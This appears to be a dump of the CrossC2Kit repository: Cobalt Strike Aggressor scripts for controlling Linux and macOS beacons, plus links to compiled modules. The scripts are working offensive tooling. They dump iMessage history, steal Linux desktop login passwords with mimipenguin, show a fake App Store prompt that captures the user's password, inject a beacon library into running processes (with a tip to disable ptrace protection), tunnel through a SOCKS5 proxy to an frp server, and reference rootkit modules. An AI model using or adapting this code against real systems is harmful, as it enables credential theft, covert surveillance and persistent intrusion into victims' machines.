lc(beacon_info($bid, "os")); 65 | $arch = beacon_info($bid, "arch"); 66 | if ('macos' isin $os) { 67 | return 'MacOS(intel)'; 68 | } 69 | return ''; 70 | } -------------------------------------------------------------------------------- /gather/message/cc2_iMessage_dump.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/message/cc2_iMessage_dump.dylib -------------------------------------------------------------------------------- /gather/message/iMessage_dump.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_iMessage_dump { 5 | blog($1, "\nUsage: cc2_iMessage_dump \n\tdump message from iMessage.\nEx:\n\tcc2_iMessage_dump test 100"); 6 | } 7 | 8 | sub cc2_iMessage_dump { 9 | $taskName = "cc2_iMessage_dump"; # taskName 10 | $taskType = "dylib"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $username = $2; 15 | $queryCount = $3; 16 | $transportArg = $username."^".$queryCount; 17 | 18 | if ($username && $queryCount) { 19 | $loadlib = "gather/message/cc2_iMessage_dump.dylib"; 20 | blog($beaconid, "cc2_iMessage_dump: "); 21 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 22 | } else { 23 | printUsage_safari_dump($beaconid); 24 | } 25 | 26 | } 27 | 28 | ssh_alias("cc2_iMessage_dump", &cc2_iMessage_dump); 29 | 30 | ssh_command_register("cc2_iMessage_dump", "CrossC2 iMessage dump - dump message from iMessage.", "\nUsage: cc2_iMessage_dump \n\tdump message from iMessage.\nEx:\n\tcc2_iMessage_dump test 100"); 31 | 32 | sub openIMessageDumpDialogCallBack { 33 | $bid = $3['bid']; 34 | $username = $3['d_username']; 35 | $queryCount = $3['d_count']; 36 | binput($bid, "cc2_iMessage_dump $username $queryCount"); 37 | cc2_iMessage_dump($bid, $username, $queryCount); 38 | } 39 | 40 | sub openIMessageDumpDialog { 41 | local('$bid $dialog'); 42 | $bid = $1; 43 | $dialog = dialog("CrossC2 iMessage dump", %(bid => $bid[0], d_username => "test", d_count => "100"), &openIMessageDumpDialogCallBack); 44 | dialog_description($dialog, "dump message from iMessage"); 45 | 46 | drow_text($dialog, "d_username", "username: ", 20); 47 | drow_text($dialog, "d_count", "history count: ", 20); 48 | 49 | dbutton_action($dialog, "run"); 50 | dialog_show($dialog); 51 | } 52 | 53 | sub cc2_iMessage_dump_status { 54 | local('$bid $os $arch $system'); 55 | $bid = $1; 56 | $os = lc(beacon_info($bid, "os")); 57 | $arch = beacon_info($bid, "arch"); 58 | if ('macos' isin $os) { 59 | return 'MacOS(intel)'; 60 | } 61 | return ''; 62 | } -------------------------------------------------------------------------------- /gather/password/mimipenguin/cc2_mimipenguin.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_mimipenguin { 5 | blog($1, "\nUsage: cc2_mimipenguin\n\troot permissions\ndump the login password from the current linux desktop\nEx:\n\tcc2_mimipenguin"); 6 | } 7 | 8 | sub cc2_mimipenguin { 9 | $taskName = "cc2_mimipenguin"; # taskName 10 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # info -> normal message 12 | 13 | $beaconid = $1; 14 | 15 | $os = lc(beacon_info($beaconid, "os")); 16 | $arch = beacon_info($beaconid, "arch"); 17 | $transportArg = "blankArg"; 18 | 19 | $loadlib = $null; 20 | 21 | if ('linux' isin $os) { 22 | if ($arch eq 'x86') { 23 | $loadlib = "gather/password/mimipenguin/mimipenguin32.so"; 24 | } else if ($arch eq 'x64') { 25 | $loadlib = "gather/password/mimipenguin/mimipenguin.so"; 26 | } 27 | } else { 28 | berror($beaconid, "*[error]: Only supports linux."); 29 | } 30 | 31 | if ($loadlib) { 32 | blog($beaconid, "mimipenguin dump login password"); 33 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 34 | } 35 | } 36 | 37 | ssh_alias("cc2_mimipenguin", &cc2_mimipenguin); 38 | 39 | ssh_command_register("cc2_mimipenguin", "CrossC2 mimipenguin - dump the login password from the current linux desktop", "\nUsage: cc2_mimipenguin\n\tneed root permissions, dump the login password from the current linux desktop\nEx:\n\tcc2_mimipenguin"); 40 | 41 | sub openMimipenguinDialog { 42 | local('$bid $dialog'); 43 | $bid = $1; 44 | binput($bid, "cc2_mimipenguin"); 45 | cc2_mimipenguin($bid); 46 | } 47 | 48 | sub cc2_mimipenguin_status { 49 | local('$bid $os $arch $system'); 50 | $bid = $1; 51 | $os = lc(beacon_info($bid, "os")); 52 | $arch = beacon_info($bid, "arch"); 53 | if ('linux' isin $os) { 54 | if ($arch eq 'x86') { 55 | return 'Linux32'; 56 | } else if ($arch eq 'x64') { 57 | return 'Linux64'; 58 | } 59 | } 60 | return ''; 61 | } -------------------------------------------------------------------------------- /gather/password/mimipenguin/mimipenguin.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/password/mimipenguin/mimipenguin.so -------------------------------------------------------------------------------- /gather/password/mimipenguin/mimipenguin32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/password/mimipenguin/mimipenguin32.so -------------------------------------------------------------------------------- /gather/prompt/osx/cc2_prompt_spoof.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/prompt/osx/cc2_prompt_spoof.dylib -------------------------------------------------------------------------------- /gather/prompt/osx/cc2_prompt_spoof_dylib.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_prompt_spoof { 5 | blog($1, "\nUsage: cc2_prompt_spoof \nEx:\n\tcc2_prompt_spoof osx English"); 6 | } 7 | 8 | sub cc2_prompt_spoof { 9 | $taskName = "cc2_prompt_spoof"; # taskName 10 | $taskType = "dylib"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # info -> normal message 12 | 13 | $beaconid = $1; 14 | $displayName = $2; 15 | $transportArg = $displayName."^"; 16 | 17 | $os = lc(beacon_info($beaconid, "os")); 18 | 19 | if ('macos' isin $os) { 20 | $loadlib = "gather/prompt/osx/cc2_prompt_spoof.dylib_bk"; 21 | } else { 22 | berror($beaconid, "*[error]: Only supports osx."); 23 | printUsage_prompt_spoof($beaconid); 24 | return; 25 | } 26 | if ($displayName) { 27 | blog($beaconid, "cc2_prompt_spoof: " . $displayName); 28 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 29 | } else { 30 | printUsage_prompt_spoof($beaconid); 31 | } 32 | 33 | } 34 | 35 | ssh_alias("cc2_prompt_spoof", &cc2_prompt_spoof); 36 | 37 | ssh_command_register("cc2_prompt_spoof", "CrossC2 prompt_spoof - (AppStore) interface pops up and prompts the user to enter a password, stealing the entered password", "\nUsage: cc2_prompt_spoof \nEx:\n\tcc2_prompt_spoof English"); 38 | 39 | 40 | sub openPromptSpoofDialogCallBack { 41 | $bid = $3['bid']; 42 | $processName = $3['processName']; 43 | binput($bid, "cc2_prompt_spoof $processName"); 44 | cc2_prompt_spoof($bid, $processName); 45 | } 46 | 47 | sub openPromptSpoofDialog { 48 | local('$bid $dialog'); 49 | $bid = $1; 50 | $dialog = dialog("CrossC2 prompt_spoof", %(bid => $bid[0], processName => "English"), &openPromptSpoofDialogCallBack); 51 | dialog_description($dialog, "(AppStore) interface pops up and prompts the user to enter a password, stealing the entered password"); 52 | 53 | drow_text($dialog, "processName", "ProcessDisplay: ", 20); 54 | 55 | dbutton_action($dialog, "run"); 56 | dialog_show($dialog); 57 | } 58 | 59 | 60 | sub cc2_prompt_spoof_status { 61 | local('$bid $os $arch $system'); 62 | $bid = $1; 63 | $os = lc(beacon_info($bid, "os")); 64 | $arch = beacon_info($bid, "arch"); 65 | if ('macos' isin $os) { 66 | return 'MacOS(intel)'; 67 | } 68 | return ''; 69 | } -------------------------------------------------------------------------------- /init/setup.cna: -------------------------------------------------------------------------------- 1 | include(script_resource("CrossC2Kit.cna")); 2 | popup generator { 3 | separator(); 4 | item "&CrossC2Kit Setup" { 5 | setupCrossC2KitPref(); 6 | } 7 | } 8 | 9 | sub modify_content { 10 | local('$flag $pathFlag $script_path $new_content $set_path $file $r_handle $index'); 11 | local('$metastr $realpath $change $w_handle'); 12 | $flag = "__CC2_INIT__:"; 13 | $pathFlag = "__CC2_INIT_PATH__"; 14 | $script_path = script_resource(); 15 | $new_content = ""; 16 | 17 | $set_path = $1; 18 | $file = $2; 19 | if ($set_path) { 20 | $script_path = $set_path; 21 | } 22 | 23 | $r_handle = openf($file); 24 | 25 | if (checkError($error)) { 26 | show_error("Could not open the file( $file ): $error"); 27 | } else { 28 | while $read (readln($r_handle)) { 29 | if ($flag isin $read) { 30 | $index = indexOf($read, $flag); 31 | if ($index ne $null) { 32 | $index = $index + strlen($flag); 33 | $metastr = substr($read, $index); 34 | $realpath = replace($metastr, $pathFlag, $script_path); 35 | $change = "$realpath #$flag$metastr"; 36 | $new_content = $new_content.$change."\n"; 37 | } 38 | } else { 39 | $new_content = $new_content.$read."\n"; 40 | } 41 | } 42 | closef($r_handle); 43 | } 44 | 45 | if ($new_content ne "") { 46 | $w_handle = openf(">$file"); 47 | if (checkError($error)) { 48 | show_error("Could not open the file( $file ): $error"); 49 | } else { 50 | writeb($w_handle, $new_content); 51 | closef($w_handle); 52 | } 53 | } 54 | } 55 | 56 | sub modify_modulepath { 57 | local('@filelist $set_path $file'); 58 | @filelist = @( 59 | "update_site/httprequest.cna", 60 | ); 61 | $set_path = $1; 62 | foreach $file(@filelist) { 63 | println("[cc2_setup]: $file "); 64 | modify_content($set_path, script_resource($file)); 65 | } 66 | } 67 | 68 | sub setupCrossC2KitPrefCallback { 69 | local('$cc2kit_dir'); 70 | $cc2kit_dir = $3['cc2kit_dir']; 71 | if ($cc2kit_dir) { 72 | pref_set("cc2kit_path", $cc2kit_dir); 73 | } 74 | modify_modulepath($cc2kit_dir); 75 | } 76 | 77 | sub setupCrossC2KitPref { 78 | local('$cc2kit_path $dialog'); 79 | 80 | $cc2kit_path = pref_get("cc2kit_path"); 81 | if ($cc2kit_path eq "") { 82 | $cc2kit_path = "/cs/script/CrossC2Kit"; 83 | } 84 | 85 | $dialog = dialog("Edit script", %(cc2kit_dir => $cc2kit_path), &setupCrossC2KitPrefCallback); 86 | dialog_description($dialog, "Setup CrossC2 Kit Path"); 87 | drow_text($dialog, "cc2kit_dir", "CrossC2 Kit Path: "); 88 | dbutton_action($dialog, "OK"); 89 | dialog_show($dialog); 90 | } 91 | 92 | local('$cc2kit_path'); 93 | $cc2kit_path = pref_get("cc2kit_path"); 94 | if ($cc2kit_path eq "") { 95 | println("[cc2_setup]: auto setup"); 96 | modify_modulepath(); 97 | } -------------------------------------------------------------------------------- /jobs/cc2_jobs.cna: -------------------------------------------------------------------------------- 1 | 2 | #include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_jobs { 5 | blog($1, "\nUsage: cc2_job (PID/all)\n\tcc2_job list\n\tcc2_job kill 222\n\tcc2_job kill all\n"); 6 | } 7 | 8 | sub cc2_job { 9 | $taskName = "cc2_job"; # taskName 10 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # info -> normal message 12 | 13 | $beaconid = $1; 14 | $jobType = $2; 15 | $optionalPID = $3; 16 | $transportArg = $jobType . "^" . $optionalPID; 17 | $arch = beacon_info($beaconid, "arch"); 18 | $os = lc(beacon_info($beaconid, "os")); 19 | if ('linux' isin $os) { 20 | if ($arch eq 'x86') { 21 | $loadlib = "jobs/cc2_jobs32.so"; 22 | } else if ($arch eq 'x64') { 23 | $loadlib = "jobs/cc2_jobs.so"; 24 | } 25 | } else if ('macos' isin $os) { 26 | $loadlib = "jobs/cc2_jobs.dylib"; 27 | } else { 28 | berror($beaconid, "*[error]: system $os "); 29 | printUsage_jobs($beaconid); 30 | } 31 | 32 | if ($jobType) { 33 | if ($jobType eq "kill") { 34 | if ($optionalPID eq $null) { 35 | berror($beaconid, "*[error]: PID"); 36 | printUsage_jobs($beaconid); 37 | return 0; 38 | } 39 | } else if ($jobType ne "list") { 40 | berror($beaconid, "*[error]: function type"); 41 | printUsage_jobs($beaconid); 42 | return; 43 | } 44 | binput($beaconid, "cc2_job $jobType $optionalPID"); 45 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 46 | } else { 47 | berror($beaconid, "*[error]: job type"); 48 | printUsage_jobs($beaconid); 49 | } 50 | } 51 | 52 | ssh_alias("cc2_job", &cc2_job); 53 | 54 | ssh_command_register("cc2_job", "CrossC2 joblist - Manage running tasks", "\nUsage: cc2_job (PID/all)\n\tcc2_job linux list\n\tcc2_job kill 222\n\tcc2_job kill all\n"); 55 | 56 | 57 | sub openJobDialog { 58 | local('$bid $dialog'); 59 | foreach $bid($1) { 60 | if ($2[0] eq "list") { 61 | cc2_job($bid, "list"); 62 | } else if ($2[1] eq "all") { 63 | cc2_job($bid, "kill", "all"); 64 | } else { 65 | prompt_text("Kill PID", "", lambda({ 66 | cc2_job($bid, "kill", "$1"); 67 | }, $bid => $bid)); 68 | } 69 | } 70 | } 71 | 72 | 73 | sub cc2_job_status { 74 | local('$bid $os $arch $system'); 75 | $bid = $1; 76 | $os = lc(beacon_info($bid, "os")); 77 | $arch = beacon_info($bid, "arch"); 78 | if ('linux' isin $os) { 79 | if ($arch eq 'x86') { 80 | return 'Linux32'; 81 | } else if ($arch eq 'x64') { 82 | return 'Linux64'; 83 | } 84 | } else if ('macos' isin $os) { 85 | return 'MacOS(intel)'; 86 | } 87 | return ''; 88 | } -------------------------------------------------------------------------------- /jobs/cc2_jobs.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/jobs/cc2_jobs.dylib -------------------------------------------------------------------------------- /jobs/cc2_jobs.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/jobs/cc2_jobs.so -------------------------------------------------------------------------------- /jobs/cc2_jobs32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/jobs/cc2_jobs32.so -------------------------------------------------------------------------------- /media/15854585486601/15854593957704.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/15854585486601/15854593957704.jpg -------------------------------------------------------------------------------- /media/16295280892271/16295284817531.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/16295280892271/16295284817531.jpg -------------------------------------------------------------------------------- /media/16295280892271/16295285029337.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/16295280892271/16295285029337.jpg -------------------------------------------------------------------------------- /media/16295280892271/16547563992094.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/16295280892271/16547563992094.jpg -------------------------------------------------------------------------------- /media/16295280892271/16547565084907.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/16295280892271/16547565084907.jpg -------------------------------------------------------------------------------- /patch/install_name_tool: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/patch/install_name_tool -------------------------------------------------------------------------------- /patch/libpatchelf.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/patch/libpatchelf.so -------------------------------------------------------------------------------- /patch/libpatchelf32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/patch/libpatchelf32.so -------------------------------------------------------------------------------- /process/libinjector64.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/process/libinjector64.so -------------------------------------------------------------------------------- /process/processhelper.cna: -------------------------------------------------------------------------------- 1 | 2 | sub bcc2_inject_cb { 3 | local('$taskName $taskType $taskResType'); 4 | local('$injectMOD $inject_PID $injectObjectPath'); 5 | local('$bid $args $transportArg'); 6 | $taskName = "cc2_inject"; # taskName 7 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 8 | $taskResType = "info"; # info -> normal message 9 | 10 | $bid = $1; 11 | $args = $2; 12 | $injectMOD = $args[0]; 13 | $inject_PID = $args[1]; 14 | $injectObjectPath = $args[2]; 15 | $transportArg = 'bash^'.$injectObjectPath.'^'.$inject_PID; 16 | $transportArg = $injectObjectPath.'^'.$inject_PID; 17 | btask($bid, "[cc2_inject]: use MOD -> ".$injectMOD); 18 | bcrossc2_load_dyn($bid, $taskType, $taskName, $taskResType, $injectMOD, $transportArg); 19 | } 20 | 21 | sub bcc2_inject { 22 | local('$bid $inject_PID $inject_Data $savepath $savename $injectObjectPath'); 23 | local('$bd $os $arch $injectMOD'); 24 | # bcc2_inject($bid, $pid, $file, $temp_file_workpath); 25 | # -> check_os_arch($bid) 26 | # shell rm $temp_file_workpath+random(8) 27 | $bid = $1; 28 | $inject_PID = $2; 29 | $inject_Data = $3; 30 | $savepath = $4; 31 | $savename = random_string(8); 32 | if ($savepath eq '') { 33 | $savepath = '/tmp/'; 34 | } 35 | $injectObjectPath = $savepath.'/'.$savename; 36 | 37 | $bd = bdata($bid); 38 | $os = lc(beacon_info($bid, "os")); 39 | $arch = beacon_info($bid, "arch"); 40 | $injectMOD = $null; 41 | 42 | binput($bid, "cc2_inject $inject_PID libbeacon $savepath"); 43 | btask($bid, "[cc2_inject]: [tips]: [if ptrace attach failed]: echo 0 > /proc/sys/kernel/yama/ptrace_scope"); 44 | 45 | if ('linux' isin $os) { 46 | if ($arch eq 'x86') { 47 | $injectMOD = 'process/libinject32.so'; 48 | } else if ($arch eq 'x64') { 49 | $injectMOD = 'process/libinjector64.so'; 50 | } 51 | } else if ('macos' isin $os) { 52 | $injectMOD = 'process/libinject.dylib'; 53 | } 54 | 55 | if ($injectMOD) { 56 | btask($bid, "[cc2_inject]: inject ".$injectObjectPath." to pid-[".$inject_PID."]"); 57 | bawait_upload_raw($bid, $inject_Data, $savepath, $savename, &bcc2_inject_cb, @($injectMOD, $inject_PID, $injectObjectPath)); 58 | } else { 59 | berror($bid, "[cc2_inject]: unknow platform"); 60 | } 61 | } 62 | 63 | sub cc2_inject { 64 | local('$bid $pid $file $temp_file_workpath $handle $fileData'); 65 | $bid = $1; 66 | $pid = $2; 67 | $file = $3; 68 | if (-exists script_resource($3)) { 69 | $file = script_resource($3); 70 | } 71 | $handle = openf($loadFilePath); 72 | $fileData = readb($handle, -1); 73 | closef($handle); 74 | 75 | $temp_file_workpath = $4; 76 | if ($temp_file_workpath eq $null) { 77 | $temp_file_workpath = '/tmp/'; 78 | } 79 | bcc2_inject($bid, $pid, $fileData, $temp_file_workpath); 80 | } 81 | 82 | ssh_alias("cc2_inject", &cc2_inject); 83 | 84 | ssh_command_register("cc2_inject", "CrossC2 process inject", "\nUsage: cc2_inject PID lib_file_path workpath\n\tcc2_inject 1524 c:\\libtest.so /tmp/\n"); 85 | 86 | popup processbrowser { 87 | separator(); 88 | menu "&CC2ProcessHelper" { 89 | item "&inject" { injectDialog($1, $2); } 90 | } 91 | } 92 | sub injectDialogCallBack { 93 | local('$listener $bid $targetLines $libbeaconData $workspace'); 94 | $listener = $3['listener']; 95 | $bid = $3['bid']; 96 | $workspace = $3['workspace']; 97 | $injectPID = $3['injectPID']; 98 | # get libbeaconData from CrossC2 listener 99 | $libbeaconData = getCrossC2Beacon($listener, 'lib'); 100 | bcc2_inject($bid, $injectPID, $libbeaconData, $workspace); 101 | } 102 | 103 | sub injectDialog { 104 | local('%beaconListenerMap @beaconListenerMenu'); 105 | %beaconListenerMap = getCrossC2Listener(); 106 | @beaconListenerMenu = @(); 107 | foreach $key => $value (%beaconListenerMap) { 108 | add(@beaconListenerMenu, $value[0]); 109 | } 110 | $bid = $1; 111 | $injectPID = $2[0]['PID']; 112 | $dialog = dialog("Choose inject Listener", %(bid => $bid, injectPID => $injectPID, listener => $null, workspace => "/tmp/"), &injectDialogCallBack); 113 | drow_text($dialog, "workspace", "workspace: ", 20); 114 | drow_combobox($dialog, "listener", "CrossC2 Listener: ", @beaconListenerMenu); 115 | 116 | dbutton_action($dialog, "inject"); 117 | dialog_show($dialog); 118 | } 119 | 120 | 121 | sub openInjectDialogCallBack { 122 | local('$bid $f_server_lh $f_server_lp $f_token $protocol $s5_username $s5_password $s5_port'); 123 | local('$os $arch $system'); 124 | $listener = $3['listener']; 125 | $bid = $3['bid']; 126 | $workspace = $3['workspace']; 127 | $injectPID = $3['injectPID']; 128 | $lib_file = $3['libFile']; 129 | 130 | if ($listener) { 131 | $libbeaconData = getCrossC2Beacon($listener, 'lib'); 132 | bcc2_inject($bid, $injectPID, $libbeaconData, $workspace); 133 | } else if ($lib_file) { 134 | cc2_inject($bid, $injectPID, $lib_file, $workspace); 135 | } 136 | } 137 | 138 | sub openInjectDialog { 139 | local('$bid $dialog'); 140 | $bid = $1; 141 | local('%beaconListenerMap @beaconListenerMenu'); 142 | %beaconListenerMap = getCrossC2Listener(); 143 | @beaconListenerMenu = @(); 144 | foreach $key => $value (%beaconListenerMap) { 145 | add(@beaconListenerMenu, $value[0]); 146 | } 147 | add(@beaconListenerMenu,"null"); 148 | $dialog = dialog("ProcessInject", %(bid => $bid[0], injectPID => "", workspace => "/tmp/", lib_file => $null, listener => $null), &openInjectDialogCallBack); 149 | dialog_description($dialog, "Inject dynamic library file or CrossC2 listener"); 150 | 151 | drow_text($dialog, "injectPID", "inject PID: ", 20); 152 | drow_text($dialog, "workspace", "workspace: ", 20); 153 | drow_file($dialog, "lib_file", "Choose: dynamic library file"); 154 | drow_combobox($dialog, "listener", "CrossC2 Listener: ", @beaconListenerMenu); 155 | dbutton_action($dialog, "run"); 156 | dialog_show($dialog); 157 | } 158 | 159 | sub cc2_inject_status { 160 | local('$bid $os $arch $system'); 161 | $bid = $1; 162 | $os = lc(beacon_info($bid, "os")); 163 | $arch = beacon_info($bid, "arch"); 164 | if ('linux' isin $os) { 165 | if ($arch eq 'x64') { 166 | return 'Linux64'; 167 | } 168 | } 169 | return ''; 170 | } -------------------------------------------------------------------------------- /proxy/frp/cc2_frp.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_frp { 5 | blog($1, "\nCrossC2 proxy frp - Start SOCKS5 {TCP/KCP(UDP)}\nby: daybr4ak\nUsage: cc2_frp \n\n\tsip: \tfrp server ip\n\tsport: \tfrp server port\n\ttoken: \tfrp token\n\tprotocol: \ttcp / kcp\n\tuser: \tsocks5 username\n\tpass: \tsocks5 password\n\trport: \tsocks5 port\nEx:\n\tcc2_frp linux 112.12.11.12:8000 token1234 tcp admin:passwd:8001"); 6 | } 7 | 8 | sub cc2_frp { 9 | local('$taskName $taskType $taskResType'); 10 | local('$bid $arch $server_host $token $protocol $bindInfo $transportArg'); 11 | local('$loadlib $t_host $t_user $t_pwd $t_port'); 12 | $taskName = "cc2_frp"; # taskName 13 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 14 | $taskResType = "info"; # info -> normal message 15 | 16 | $bid = $1; 17 | $arch = $2; 18 | $server_host = $3; 19 | $token = $4; 20 | $protocol = $5; 21 | $bindInfo = $6; 22 | $transportArg = $server_host . "^" . $token . "^" . $protocol . "^" . $bindInfo; 23 | 24 | if ($arch eq "osx") { 25 | $loadlib = "proxy/frp/crossc2_frp.dylib"; 26 | } else if ($arch eq "linux32") { 27 | $loadlib = "proxy/frp/crossc2_frp32.so"; 28 | } else if ($arch eq "linux") { 29 | $loadlib = "proxy/frp/crossc2_frp.so"; 30 | } else { 31 | berror($bid, "*[error]: system"); 32 | printUsage_frp($bid); 33 | return; 34 | } 35 | if ($server_host && $token && $protocol && $bindInfo) { 36 | ($t_host, $_) = split(":", $server_host); 37 | ($t_user, $t_pwd, $t_port) = split(":", $bindInfo); 38 | blog($bid, "s5(server\[$protocol\]) $t_host\:$t_port $t_user\:$t_pwd"); 39 | bcrossc2_load_dyn($bid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 40 | } else { 41 | printUsage_frp($bid); 42 | } 43 | 44 | } 45 | 46 | ssh_alias("cc2_frp", &cc2_frp); 47 | 48 | ssh_command_register("cc2_frp", "CrossC2 proxy frp - Start Linux/MacOS SOCKS5 proxy {TCP/KCP(UDP)}", "\nby: daybr4ak\nUsage: cc2_frp \n\n\tsip: \tfrp server ip\n\tsport: \tfrp server port\n\ttoken: \tfrp token\n\tprotocol: \ttcp / kcp\n\tuser: \tsocks5 username\n\tpass: \tsocks5 password\n\trport: \tsocks5 port\nEx:\n\tcc2_frp linux 112.12.11.12:8000 token1234 tcp admin:passwd:8001"); 49 | 50 | 51 | sub openProxyDialogCallBack { 52 | local('$bid $f_server_lh $f_server_lp $f_token $protocol $s5_username $s5_password $s5_port'); 53 | local('$os $arch $system'); 54 | $bid = $3['bid']; 55 | $f_server_lh = $3['f_server_lh']; 56 | $f_server_lp = $3['f_server_lp']; 57 | $f_token = $3['f_token']; 58 | $protocol = $3['protocol']; 59 | $s5_username = $3['s5_username']; 60 | $s5_password = $3['s5_password']; 61 | $s5_port = $3['s5_port']; 62 | 63 | $os = lc(beacon_info($bid, "os")); 64 | $arch = beacon_info($bid, "arch"); 65 | $system = ""; 66 | if ('linux' isin $os) { 67 | if ($arch eq 'x86') { 68 | $system = "linux32"; 69 | } else if ($arch eq 'x64') { 70 | $system = "linux"; 71 | } 72 | } else if ('macos' isin $os) { 73 | $system = "osx"; 74 | } 75 | binput($bid, "cc2_frp $system $f_server_lh\:$f_server_lp $f_token $protocol $s5_username\:$s5_password\:$s5_port"); 76 | blog($bid, "proxy (server\[$protocol\], client\[$system\]) \: $f_server_lh\:$s5_port $s5_username / $s5_password"); 77 | cc2_frp($bid, $system, $f_server_lh.':'.$f_server_lp, $f_token, $protocol, $s5_username.':'.$s5_password.':'.$s5_port); 78 | } 79 | 80 | sub openProxyDialog { 81 | local('$bid $dialog'); 82 | $bid = $1; 83 | $dialog = dialog("proxy s5", %(bid => $bid[0], f_server_lh => "x.x.x.x", f_server_lp => "4444", f_token => "frp-server-token", protocol => "tcp", s5_username => "admin", s5_password => "password", s5_port => "8080"), &openProxyDialogCallBack); 84 | dialog_description($dialog, "setup frp proxy"); 85 | 86 | drow_text($dialog, "f_server_lh", "frp listening host: ", 20); 87 | drow_text($dialog, "f_server_lp", "frp listening port: ", 20); 88 | drow_text($dialog, "f_token", "frp listening token: ", 20); 89 | drow_combobox($dialog, "protocol", "Type: ", @("tcp", "udp")); 90 | drow_text($dialog, "s5_username", "socks5 username: "); 91 | drow_text($dialog, "s5_password", "socks5 password: "); 92 | drow_text($dialog, "s5_port", "socks5 port: "); 93 | 94 | dbutton_action($dialog, "run"); 95 | dialog_show($dialog); 96 | } 97 | 98 | 99 | sub cc2_frp_status { 100 | local('$bid $os $arch $system'); 101 | $bid = $1; 102 | $os = lc(beacon_info($bid, "os")); 103 | $arch = beacon_info($bid, "arch"); 104 | if ('linux' isin $os) { 105 | if ($arch eq 'x86') { 106 | return ''; 107 | } else if ($arch eq 'x64') { 108 | return 'Linux64'; 109 | } 110 | } else if ('macos' isin $os) { 111 | return 'MacOS(intel)'; 112 | } 113 | return ''; 114 | } -------------------------------------------------------------------------------- /proxy/frp/crossc2_frp.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/proxy/frp/crossc2_frp.dylib -------------------------------------------------------------------------------- /proxy/frp/crossc2_frp.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/proxy/frp/crossc2_frp.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_mgr.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_mgr.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_mgr32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_mgr32.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_module.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_module.so 